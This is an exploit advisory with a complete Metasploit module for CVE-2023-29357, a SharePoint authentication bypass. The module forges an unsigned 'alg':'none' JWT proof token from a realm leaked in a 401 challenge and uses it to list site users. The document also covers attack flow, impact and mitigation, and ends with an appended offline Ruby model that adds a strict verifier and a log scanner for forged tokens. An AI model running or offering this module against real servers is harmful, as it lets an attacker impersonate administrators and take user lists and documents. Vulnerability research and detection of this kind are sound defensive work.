=============================================================================================================================================
| # Title : SharePoint Authentication Bypass                                                                                                |
| # Author : indoushka                                                                                                                       |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
| # Vendor : https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration                                                         |
=============================================================================================================================================

POC :

1. Summary :

This advisory covers a critical authentication bypass in Microsoft SharePoint tracked as CVE-2023-29357 (https://packetstorm.news/files/id/207960/). The flaw allows an attacker to craft an unsigned JWT with "alg": "none" and impersonate any SharePoint user, including Site Administrators, without possessing valid credentials. The vulnerability is dangerous because it exposes internal SharePoint APIs to an unauthenticated attacker and may enable privilege escalation or, chained with other bugs, full system compromise.

-------------------------
How to Run the Exploit
-------------------------

### **1. Save the script**

Save the code as:

~/.msf4/modules/auxiliary/sharepoint/cve_2023_29357.rb

### **2. Start it from terminal**

msfconsole
use auxiliary/sharepoint/cve_2023_29357
set RHOSTS https://target.com
run

Recent Metasploit releases accept a full URL in RHOSTS and derive the port and SSL setting from it. If the SharePoint site is not served from /, set TARGETURI to the site collection path as well.

-------------------------
auxiliary :
-------------------------

##
# CVE-2023-29357 SharePoint Auth Bypass
# by Indoushka
##
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'SharePoint Auth Bypass (CVE-2023-29357)',
      'Description' => %q{
        This module exploits an authentication bypass in Microsoft SharePoint
        (CVE-2023-29357) using a crafted JWT token with "alg":"none".
      },
      'Author'      => [ 'Indoushka (Conversion to MSF)' ],
      'License'     => MSF_LICENSE,
      'References'  => [
        ['CVE', '2023-29357'],
        ['URL', 'https://packetstorm.news/files/id/207960/']
      ]
    ))

    register_options(
      [
        OptString.new('TARGETURI', [ true, 'Base SharePoint URL', '/' ])
      ]
    )
  end

  # Build the unsigned token: an "alg":"none" header, the proof-token claim set,
  # and a junk third segment that the vulnerable server never checks.
  def create_jwt(aud, client_id)
    header = { alg: 'none' }
    now = Time.now.to_i
    payload = {
      aud: aud,
      iss: client_id,
      nbf: now,
      exp: now + 3600,
      ver: "hashedprooftoken",
      nameid: "#{client_id}@#{aud.split('@')[1]}",
      endpointurl: "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
      endpointurlLength: 1,
      isloopback: true
    }
    encoded_header = Rex::Text.encode_base64url(header.to_json)
    encoded_payload = Rex::Text.encode_base64url(payload.to_json)
    "#{encoded_header}.#{encoded_payload}.AAA"
  end

  # An empty Bearer header makes SharePoint answer 401 and disclose the realm
  # in WWW-Authenticate.
  def get_realm
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, "_api/web/siteusers"),
      'headers' => { 'Authorization' => 'Bearer ' }
    }, 3)
    return nil unless res&.code == 401
    auth = res.headers['WWW-Authenticate']
    return nil unless auth
    auth[/realm=\"([^\"]+)\"/, 1]
  end

  def run
    client_id = "00000003-0000-0ff1-ce00-000000000000"

    print_status("Fetching realm...")
    realm = get_realm
    if realm.nil?
      print_error("Failed to extract realm")
      return
    end
    print_good("Realm: #{realm}")

    aud = "#{client_id}@#{realm}"
    jwt = create_jwt(aud, client_id)

    print_status("Trying authentication bypass...")
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri(target_uri.path, "_api/web/siteusers"),
      'headers' => {
        'Authorization' => "Bearer #{jwt}",
        'X-PROOF_TOKEN' => jwt,
        'Accept'        => 'application/json'
      }
    }, 5)

    if res && res.code == 200
      print_good("Authentication bypass success!")
      print_line(res.body) if res.body
    else
      print_error("Bypass failed. HTTP #{res&.code}")
    end
  end
end

---------------------------------------------------------------------------------------------------------
[ Technical Description ]
---------------------------------------------------------------------------------------------------------

• The attacker sends an unauthenticated request to:

      https://TARGET/_api/web/siteusers

  This makes SharePoint respond with a 401 and expose the Realm value.

• The Realm is extracted from the "WWW-Authenticate" header:

      Bearer realm="XXXXXXXXXXXXXXXXXXXXXXXXXXXX"

• The attacker forges a JWT whose header is:

      { "alg": "none" }

• The "aud" field is constructed as:

      00000003-0000-0ff1-ce00-000000000000@REALM

• The forged token is sent to SharePoint REST API endpoints, both as the Bearer value of the Authorization header and in the X-PROOF_TOKEN header.

• Because the header declares "alg": "none", the signature is never checked; SharePoint accepts the token and treats the attacker as the user named in the nameid claim.

The module above performs steps 1 to 3 of the following and prints the siteusers response; the response lists the site's users (each with its IsSiteAdmin flag), which covers step 4, while step 5 is left to the operator:

1. Realm extraction
2. Token forgery
3. Authentication bypass
4. Admin enumeration
5. Privilege validation

Core logic excerpt (Metasploit Ruby; b64 stands for base64url encoding, Rex::Text.encode_base64url in the module):

    jwt_header = { alg: "none" }.to_json

    jwt_payload = {
      aud: "#{client_id}@#{realm}",
      iss: client_id,
      nbf: Time.now.to_i,
      exp: Time.now.to_i + 3600,
      ver: "hashedprooftoken",
      nameid: "#{client_id}@#{realm}",
      endpointurl: "qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=",
      endpointurlLength: 1,
      isloopback: true
    }.to_json

    unsigned_token = "#{b64(jwt_header)}.#{b64(jwt_payload)}.AAA"

    send_request_cgi({
      'method'  => 'GET',
      'uri'     => normalize_uri('_api', 'web', 'currentuser'),
      'headers' => {
        "Authorization" => "Bearer #{unsigned_token}",
        "X-PROOF_TOKEN" => unsigned_token
      }
    })

---------------------------------------------------------------------------------------------------------
[ Attack Flow ]
---------------------------------------------------------------------------------------------------------

1. Force 401 → Extract Realm
2. Build forged JWT
3. Bypass authentication
4. Enumerate site admins
5. Optional: Impersonate admin (SharePoint accepts spoofing)
6. Dump internal API data

---------------------------------------------------------------------------------------------------------
[ Impact ]
---------------------------------------------------------------------------------------------------------

✔ Full user enumeration
✔ Admin identification
✔ Access to restricted SharePoint API routes
✔ Potential privilege escalation
✔ Ability to chain with RCE vulnerabilities (CVE-2023-24955)
✔ Data leakage (lists, documents, users, groups…)

Severity: **CRITICAL**

---------------------------------------------------------------------------------------------------------
[ Mitigation ]
---------------------------------------------------------------------------------------------------------

• Install the official Microsoft patch for CVE-2023-29357
• Enforce strict JWT signature verification
• Reject any token with "alg":"none"
• Disable loopback trust token mode
• Monitor ULS logs for abnormal access patterns

To confirm the patch took effect, repeat the module's request: a patched server answers the forged token with 401, not 200.

---------------------------------------------------------------------------------------------------------
[ Conclusion ]
---------------------------------------------------------------------------------------------------------

CVE-2023-29357 is a severe authentication bypass allowing attackers to impersonate any SharePoint user without credentials. The vulnerability is trivial to exploit and provides high-value access to internal SharePoint data and admin functions. Patch immediately.

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
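Added example, not code from the advisory or its Metasploit module: an offline Ruby model of the token path in the Technical Description and of the checks listed under Mitigation. It extracts the realm from a WWW-Authenticate value, forges the same "alg": "none" proof token the module builds, runs it through a strict verifier that rejects unsigned tokens, and scans request lines for such tokens. The HS256 key, SAMPLE_CHALLENGE and SAMPLE_LOG are constructed for this example; SharePoint's real validation logic is not reproduced here.

```ruby
require 'json'
require 'base64'
require 'openssl'

# Added example; not code from the advisory or its Metasploit module. Models the
# CVE-2023-29357 token path offline: realm extraction from the 401 challenge,
# forging of the unsigned "alg":"none" proof token with the module's claim set,
# the strict check that rejects it, and a scan for such tokens in log lines.
# The HS256 key, SAMPLE_CHALLENGE and SAMPLE_LOG are constructed for this
# example; SharePoint's real validation logic is not reproduced.

CLIENT_ID = '00000003-0000-0ff1-ce00-000000000000'

# Constructed 401 challenge in the shape the advisory describes (realm made up).
SAMPLE_CHALLENGE = 'Bearer realm="5a9b0c1d-2e3f-4a5b-8c9d-0e1f2a3b4c5d",' \
                   'client_id="00000003-0000-0ff1-ce00-000000000000"'

def b64url(str)
  Base64.urlsafe_encode64(str, padding: false)
end

# Step 1: pull the realm out of the WWW-Authenticate header value.
def extract_realm(www_authenticate)
  www_authenticate[/realm="([^"]+)"/, 1]
end

# The claim set the module puts in the token; nameid equals client_id@realm.
def proof_claims(realm, now)
  aud = "#{CLIENT_ID}@#{realm}"
  { aud: aud, iss: CLIENT_ID, nbf: now, exp: now + 3600,
    ver: 'hashedprooftoken', nameid: aud,
    endpointurl: 'qqlAJmTxpB9A67xSyZk+tmrrNmYClY/fqig7ceZNsSM=',
    endpointurlLength: 1, isloopback: true }
end

# Step 2: the forged token: alg "none" plus a junk third segment, as in the exploit.
def forge_proof_token(realm, now = Time.now.to_i)
  "#{b64url({ alg: 'none' }.to_json)}.#{b64url(proof_claims(realm, now).to_json)}.AAA"
end

# A legitimately issued token under the assumed HS256 scheme, for comparison.
def issue_proof_token(realm, key, now = Time.now.to_i)
  signing_input = "#{b64url({ alg: 'HS256', typ: 'JWT' }.to_json)}." \
                  "#{b64url(proof_claims(realm, now).to_json)}"
  "#{signing_input}.#{b64url(OpenSSL::HMAC.digest('SHA256', key, signing_input))}"
end

# Constant-time comparison so the signature check does not leak through timing.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Strict verifier: allow-listed alg only ("none" is never on the list), a mandatory
# signature checked before any claim is trusted, then the validity window.
def verify_proof_token(token, key, now = Time.now.to_i)
  h, p, s = token.split('.', 3)
  return :malformed if h.nil? || p.nil? || s.nil? || s.empty?
  header = JSON.parse(Base64.urlsafe_decode64(h))
  return :alg_rejected unless header['alg'] == 'HS256'
  expected = OpenSSL::HMAC.digest('SHA256', key, "#{h}.#{p}")
  return :bad_signature unless secure_equal?(Base64.urlsafe_decode64(s), expected)
  claims = JSON.parse(Base64.urlsafe_decode64(p))
  return :expired unless claims['nbf'] <= now && now < claims['exp']
  :ok
rescue JSON::ParserError, ArgumentError, TypeError, NoMethodError
  :malformed
end

# Defender side: does a Bearer token declare alg none (any case) or lack a signature?
def unsigned_bearer?(token)
  h, _p, s = token.split('.', 3)
  return false if h.nil?
  header = JSON.parse(Base64.urlsafe_decode64(h))
  header['alg'].to_s.casecmp('none').zero? || s.nil? || s.empty?
rescue JSON::ParserError, ArgumentError, TypeError, NoMethodError
  false
end

# Constructed request log lines (not ULS format); one carries a forged token.
SAMPLE_LOG = [
  "GET /_api/web/siteusers 200 Authorization=Bearer #{forge_proof_token('r', 1_700_000_000)}",
  "GET /_api/web/currentuser 200 Authorization=Bearer #{issue_proof_token('r', 'k3y', 1_700_000_000)}",
  'GET /sites/hr/default.aspx 200 Authorization=NTLM TlRMTVNTUAAB'
].freeze

def suspicious_lines(lines)
  lines.select { |l| (t = l[/Authorization=Bearer (\S+)/, 1]) && unsigned_bearer?(t) }
end

if $PROGRAM_NAME == __FILE__
  realm = extract_realm(SAMPLE_CHALLENGE)
  forged = forge_proof_token(realm)
  puts "realm: #{realm}"
  puts "forged token verdict: #{verify_proof_token(forged, 'k3y')}"
  puts "flagged #{suspicious_lines(SAMPLE_LOG).size} of #{SAMPLE_LOG.size} sample lines"
end
```

The verifier checks the algorithm against an allow-list before it looks at the signature, and the signature before it reads any claim, which is the order that makes "alg": "none" and a junk third segment such as ".AAA" fail closed; the scanner applies the same test to tokens seen in traffic so a forged proof token stands out even when the server accepted it.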